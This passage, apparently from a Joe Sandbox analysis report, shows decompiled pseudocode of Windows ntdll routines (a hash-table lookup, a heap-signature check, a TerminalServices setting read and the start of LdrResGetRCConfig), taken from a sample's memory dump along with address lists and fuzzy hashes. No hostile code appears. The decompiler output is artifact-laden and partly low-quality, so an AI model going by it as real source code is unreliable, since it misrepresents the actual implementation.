				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x34f2abd2
						_v24 = _t12;
						_t149 = L34E553C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x34f2abd2
									E34E552F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x34f491e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L34E62330(E34E988C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x34f2abd2
																E34E624D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x34f491e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E34E84CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_t383 = 4;
															}
															 *0x34f491e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
																_t83 = _t383 - 1; // 0x3
																_t288 = _t83;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x34f491e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E34F2AC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E34F2ACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E34F2AC6F(_t31) == 0) {
									_t364 = 0;
								}
								E34E552F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E34F2ACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}

0x34f2acf4
0x34f2acf6
0x34f2acfb
0x34f2acfe
0x34f2ad05
0x34f2ad05
0x34f2ad08
0x34f2ad0e
0x34f2ad6f
0x34f2ad6f
0x34f2ad72
0x34f2adc8
0x34f2adce
0x34f2add0
0x34f2add0
0x34f2add3
0x34f2add7
0x34f2adda
0x34f2addf
0x34f2ade1
0x34f2ade1
0x34f2ade1
0x34f2ade1
0x34f2adec
0x34f2adf0
0x34f2adf2
0x34f2adf5
0x34f2adf8
0x34f2adfd
0x00000000
0x00000000
0x34f2adff
0x34f2ae04
0x34f2ae69
0x34f2ae6b
0x34f2ae6d
0x34f2ae8b
0x34f2ae8b
0x34f2ae8f
0x34f2ae97
0x34f2ae9a
0x34f2aea9
0x34f2aeb1
0x34f2aeb3
0x34f2aeb8
0x34f2aec8
0x34f2aec9
0x34f2aeca
0x34f2aed6
0x34f2aedb
0x34f2aede
0x34f2aeea
0x34f2aef9
0x34f2aefe
0x34f2af01
0x34f2af03
0x34f2af03
0x34f2af03
0x34f2af0e
0x34f2af12
0x34f2af15
0x34f2af17
0x34f2af1a
0x34f2af1f
0x34f2af5b
0x34f2af5b
0x34f2af5e
0x34f2af5e
0x34f2af66
0x00000000
0x00000000
0x34f2af6f
0x34f2af75
0x34f2af77
0x34f2afae
0x34f2afae
0x34f2afb0
0x34f2afb3
0x34f2afb3
0x34f2afb6
0x34f2afb6
0x34f2afb9
0x34f2afbc
0x34f2afbf
0x34f2afc4
0x34f2afcc
0x34f2b11b
0x34f2b128
0x34f2b12d
0x34f2b12f
0x34f2b132
0x34f2b135
0x34f2b15e
0x34f2b160
0x34f2b160
0x34f2b166
0x34f2b168
0x34f2b16b
0x34f2b16d
0x34f2b16f
0x34f2b16f
0x34f2b173
0x34f2b17a
0x34f2b17c
0x34f2b180
0x34f2b185
0x34f2b18b
0x34f2b18b
0x34f2b18d
0x34f2b193
0x34f2b193
0x34f2afd4
0x34f2afdc
0x34f2afe3
0x00000000
0x00000000
0x34f2afe9
0x34f2afef
0x34f2aff3
0x34f2aff3
0x34f2afff
0x34f2b005
0x34f2b007
0x34f2b009
0x34f2b00e
0x34f2b194
0x34f2b194
0x34f2b19a
0x00000000
0x00000000
0x34f2b1a0
0x34f2b1a3
0x00000000
0x34f2b014
0x34f2b014
0x34f2b014
0x34f2b019
0x34f2b02c
0x34f2b033
0x34f2b035
0x34f2b035
0x34f2b03a
0x34f2b03c
0x34f2b049
0x34f2b052
0x34f2b056
0x34f2b058
0x34f2b067
0x34f2b067
0x34f2b070
0x34f2b07b
0x34f2b07e
0x34f2b0ec
0x34f2b0ec
0x34f2b0ec
0x34f2b0f2
0x34f2b0f5
0x34f2b0fb
0x34f2b0fe
0x34f2b100
0x34f2b105
0x34f2b110
0x34f2b116
0x34f2b118
0x34f2b118
0x34f2b118
0x00000000
0x00000000
0x00000000
0x00000000
0x34f2b080
0x34f2b080
0x34f2b080
0x34f2b080
0x34f2b083
0x34f2b086
0x34f2b086
0x34f2b089
0x34f2b092
0x00000000
0x00000000
0x34f2b096
0x34f2b09c
0x34f2b0a7
0x34f2b0b0
0x34f2b0ca
0x34f2b0cc
0x34f2b0d2
0x34f2b0d6
0x34f2b0d9
0x34f2b0d9
0x34f2b0de
0x34f2b0de
0x34f2b0e1
0x34f2b0e2
0x34f2b0e8
0x00000000
0x34f2b05a
0x34f2b05a
0x34f2b05d
0x34f2b05d
0x34f2b05e
0x34f2b060
0x34f2b063
0x00000000
0x34f2b05d
0x34f2b058
0x34f2b01b
0x34f2b020
0x34f2b027
0x34f2b02a
0x00000000
0x00000000
0x00000000
0x00000000
0x34f2b022
0x34f2b022
0x34f2b022
0x34f2b023
0x34f2b023
0x00000000
0x34f2b022
0x34f2b00e
0x00000000
0x34f2af77
0x34f2af71
0x34f2af73
0x00000000
0x34f2af73
0x34f2af21
0x34f2af26
0x34f2af8c
0x34f2af8e
0x34f2af90
0x00000000
0x00000000
0x34f2af92
0x34f2af95
0x34f2af9a
0x34f2af9c
0x34f2afa1
0x34f2afa7
0x34f2afa7
0x00000000
0x34f2afa1
0x34f2af4d
0x34f2af52
0x34f2af55
0x34f2af58
0x00000000
0x34f2af79
0x34f2af7d
0x34f2af82
0x00000000
0x34f2af8a
0x34f2aeba
0x00000000
0x34f2aeba
0x34f2ae6f
0x34f2ae6f
0x34f2ae79
0x34f2ae7b
0x34f2ae7b
0x34f2ae81
0x00000000
0x34f2ae81
0x34f2ae2b
0x34f2ae30
0x34f2ae33
0x34f2ae36
0x34f2ae39
0x34f2ae39
0x34f2ae3c
0x34f2ae3c
0x34f2ae44
0x00000000
0x00000000
0x34f2ae4d
0x34f2ae53
0x34f2ae55
0x00000000
0x00000000
0x34f2ae5b
0x34f2ae62
0x00000000
0x00000000
0x00000000
0x34f2ae64
0x34f2ae4f
0x34f2ae51
0x00000000
0x34f2ae51
0x34f2ade1
0x34f2ad74
0x34f2ad77
0x34f2adbf
0x34f2adc5
0x34f2adc7
0x00000000
0x34f2adc7
0x34f2ad79
0x34f2ad7c
0x34f2adb6
0x34f2adbc
0x34f2adbe
0x00000000
0x34f2adbe
0x34f2ad7e
0x34f2ad81
0x34f2adad
0x34f2adb3
0x34f2adb5
0x00000000
0x34f2adb5
0x34f2ad83
0x34f2ad86
0x34f2ada4
0x34f2adaa
0x34f2adac
0x00000000
0x34f2adac
0x34f2ad88
0x34f2ad8b
0x34f2ad9b
0x34f2ada1
0x34f2ada3
0x00000000
0x34f2ada3
0x34f2ad90
0x00000000
0x34f2ad92
0x34f2ad98
0x34f2ad9a
0x00000000
0x34f2ad9a
0x34f2ad10
0x34f2ad12
0x34f2ad18
0x34f2ad1a
0x34f2ad54
0x34f2ad59
0x34f2ad5f
0x34f2ad63
0x34f2ad68
0x34f2ad6a
0x34f2ad6a
0x00000000
0x34f2ad1a

APIs

RtlDebugPrintTimes.NTDLL ref: 34F2AEA9
RtlDebugPrintTimes.NTDLL ref: 34F2B185

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 05933f8cb28636248bbe8867660db269fdae18f3cc9837d2a5cc3016c9cff88f
Instruction ID: 93cc37f8044fb80e55504ce7c657ba0c185459d7ce2545c8844b7096f551a118
Opcode Fuzzy Hash: 05933f8cb28636248bbe8867660db269fdae18f3cc9837d2a5cc3016c9cff88f
Instruction Fuzzy Hash: 55F1E67BF006118FDB08CF69C9A067DBBF5EF88200B59466DD856EB394E634E942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 34E47662 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E34E47662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E34E4B910();
					} else {
						E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E34E4B910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E34E4B910(", passed to %s", _t29);
					}
					_push("\n");
					E34E4B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x34f447a1 = 1;
						asm("int3");
						 *0x34f447a1 = 0;
					}
					return 0;
				}
				return 1;
			}

0x34e47667
0x34e47669
0x34e47672
0x34eaad93
0x34eaadb2
0x34eaadb7
0x34eaad95
0x34eaadaa
0x34eaadaf
0x34eaadc3
0x34eaadcc
0x34eaadd4
0x34eaadda
0x34eaaddb
0x34eaade0
0x34eaadf0
0x34eaadf2
0x34eaadf9
0x34eaadfa
0x34eaadfa
0x00000000
0x34eaae01
0x00000000

Strings

HEAP: , xrefs: 34EAADB2
HEAP[%wZ]: , xrefs: 34EAADA5
Invalid heap signature for heap at %p, xrefs: 34EAADBE
RtlFreeHeap, xrefs: 34EAADCE
, passed to %s, xrefs: 34EAADCF

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: ed0a6d37f48aadce006d8caa6afda016136ac912aadd663c3eaabdbb15239f60
Instruction ID: a4f2e174176cfe77e567ae9115ee2b7996fc6c0bcd2fe3e60cd878ce297d8661
Opcode Fuzzy Hash: ed0a6d37f48aadce006d8caa6afda016136ac912aadd663c3eaabdbb15239f60
Instruction Fuzzy Hash: 59014736025290FFF309A3B8F409F8277A4EB41739F14448EE0405BB92CEA5A844EA64

Uniqueness

Uniqueness Score: -1.00%

Function 34E50485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E34E50485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x34f46630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E34E582E0(0xabababab, 0, "kLsE", 0);
					 *0x34f46630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E34E75C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E34E50670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E34E50670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E34E50630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E34E95050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E34E93EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E34E50690) {
					 *0x34f491e0();
					_t50 =  *_t73();
				} else {
					_t50 = E34E50690();
				}
				_t84 = _t50;
				goto L4;
			}

0x34e5048f
0x34e50493
0x34e5049a
0x34e504a0
0x34e504a3
0x34e504a6
0x34e504af
0x34e504b8
0x34e504c2
0x34e504cb
0x34e504ce
0x34e504d2
0x34e504d6
0x34e5060e
0x34e50610
0x34e50618
0x00000000
0x00000000
0x34e504ef
0x34e504ef
0x34e504f2
0x34e505e3
0x34e505ea
0x34e505f1
0x34e505f1
0x34e50501
0x34e50501
0x34e50504
0x34e5050c
0x34e50519
0x34e5051b
0x00000000
0x34eae99c
0x34eae9a2
0x34eae9ac
0x34e5051f
0x34e5052a
0x34eae9b9
0x34e505cd
0x34e505d3
0x34e505d3
0x34eae9bf
0x34e5053c
0x34e5054d
0x34e50559
0x34e50562
0x34eae9ce
0x34eae9ce
0x34e5056a
0x34e5057b
0x34e50580
0x34e50580
0x34e5058f
0x34e50597
0x34e50598
0x34e5059d
0x34e505a1
0x34e505a5
0x34e505ad
0x34e505b3
0x34eae9dd
0x00000000
0x34eae9ed
0x00000000
0x34eae9ed
0x34eae9dd
0x34e505b9
0x34e505be
0x34e505c7
0x34eae9f2
0x34eae9f2
0x34e505c7
0x00000000
0x34e505ad
0x00000000
0x34eae9b2
0x34e5050c
0x34e504fb
0x34eae989
0x34eae990
0x00000000
0x34eae990
0x00000000
0x34e504fb
0x34e504dc
0x34e504e2
0x34e505d6
0x34e505dc
0x34e504e8
0x34e504e8
0x34e504e8
0x34e504ed
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34E505D6

Strings

kLsE, xrefs: 34E505FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 34E50586

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 1fa09187716398a4e056c3c94166d213df2d47691bf6d30bb49d8be1896af09a
Instruction ID: e289cb9311ca67c445ca343cfb3ab79455c8dc0308add71e8e13c9b7f169e926
Opcode Fuzzy Hash: 1fa09187716398a4e056c3c94166d213df2d47691bf6d30bb49d8be1896af09a
Instruction Fuzzy Hash: 4851DEB5E00706DFEB20DFA4C4406AAB7F8AF45305F0088BEE59597660EB74D605CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 34E5B5E0 Relevance: 5.3, Strings: 4, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E34E5B5E0(void* __ebx, void* __edi, signed int __esi, void* __eflags) {
				short _t100;
				short _t101;
				signed int* _t107;
				signed char* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed char* _t114;
				signed int _t115;
				signed int _t117;
				signed int _t125;
				void* _t129;
				void* _t131;
				void* _t133;
				void* _t135;
				void* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t150;
				short _t158;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				signed int _t201;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				void* _t209;

				_push(0x48);
				_push(0x34f2bfb0);
				E34EA7C40(__ebx, __edi, __esi);
				_t185 =  *(_t209 + 8);
				 *(_t209 - 0x34) = _t185;
				 *(_t209 - 0x40) =  *(_t209 + 0x10);
				 *((intOrPtr*)(_t209 - 0x28)) = L"MUI";
				 *((intOrPtr*)(_t209 - 0x24)) = 1;
				 *((intOrPtr*)(_t209 - 0x20)) = 0;
				 *(_t209 - 0x38) =  *(_t209 + 0xc);
				 *(_t209 - 0x30) = 0;
				_t158 = 0x2e;
				 *((short*)(_t209 - 0x50)) = _t158;
				_t100 = 0x30;
				 *((short*)(_t209 - 0x4e)) = _t100;
				 *(_t209 - 0x4c) = L"LdrResGetRCConfig Enter";
				_t101 = 0x2c;
				 *((short*)(_t209 - 0x58)) = _t101;
				 *((short*)(_t209 - 0x56)) = _t158;
				 *(_t209 - 0x54) = L"LdrResGetRCConfig Exit";
				 *(_t209 - 0x3c) =  *(_t209 + 0x14) & 0x00002000;
				asm("sbb esi, esi");
				_t205 = (__esi & 0x00001000) + 0x1000;
				_t107 =  *( *[fs:0x30] + 0x50);
				if(_t107 != 0) {
					__eflags =  *_t107;
					if( *_t107 == 0) {
						goto L1;
					}
					_t108 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t108 & 0x00000001) != 0) {
						_t109 = E34E63C40();
						_t198 = 0x7ffe0384;
						__eflags = _t109;
						if(_t109 == 0) {
							_t110 = 0x7ffe0384;
						} else {
							_t110 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
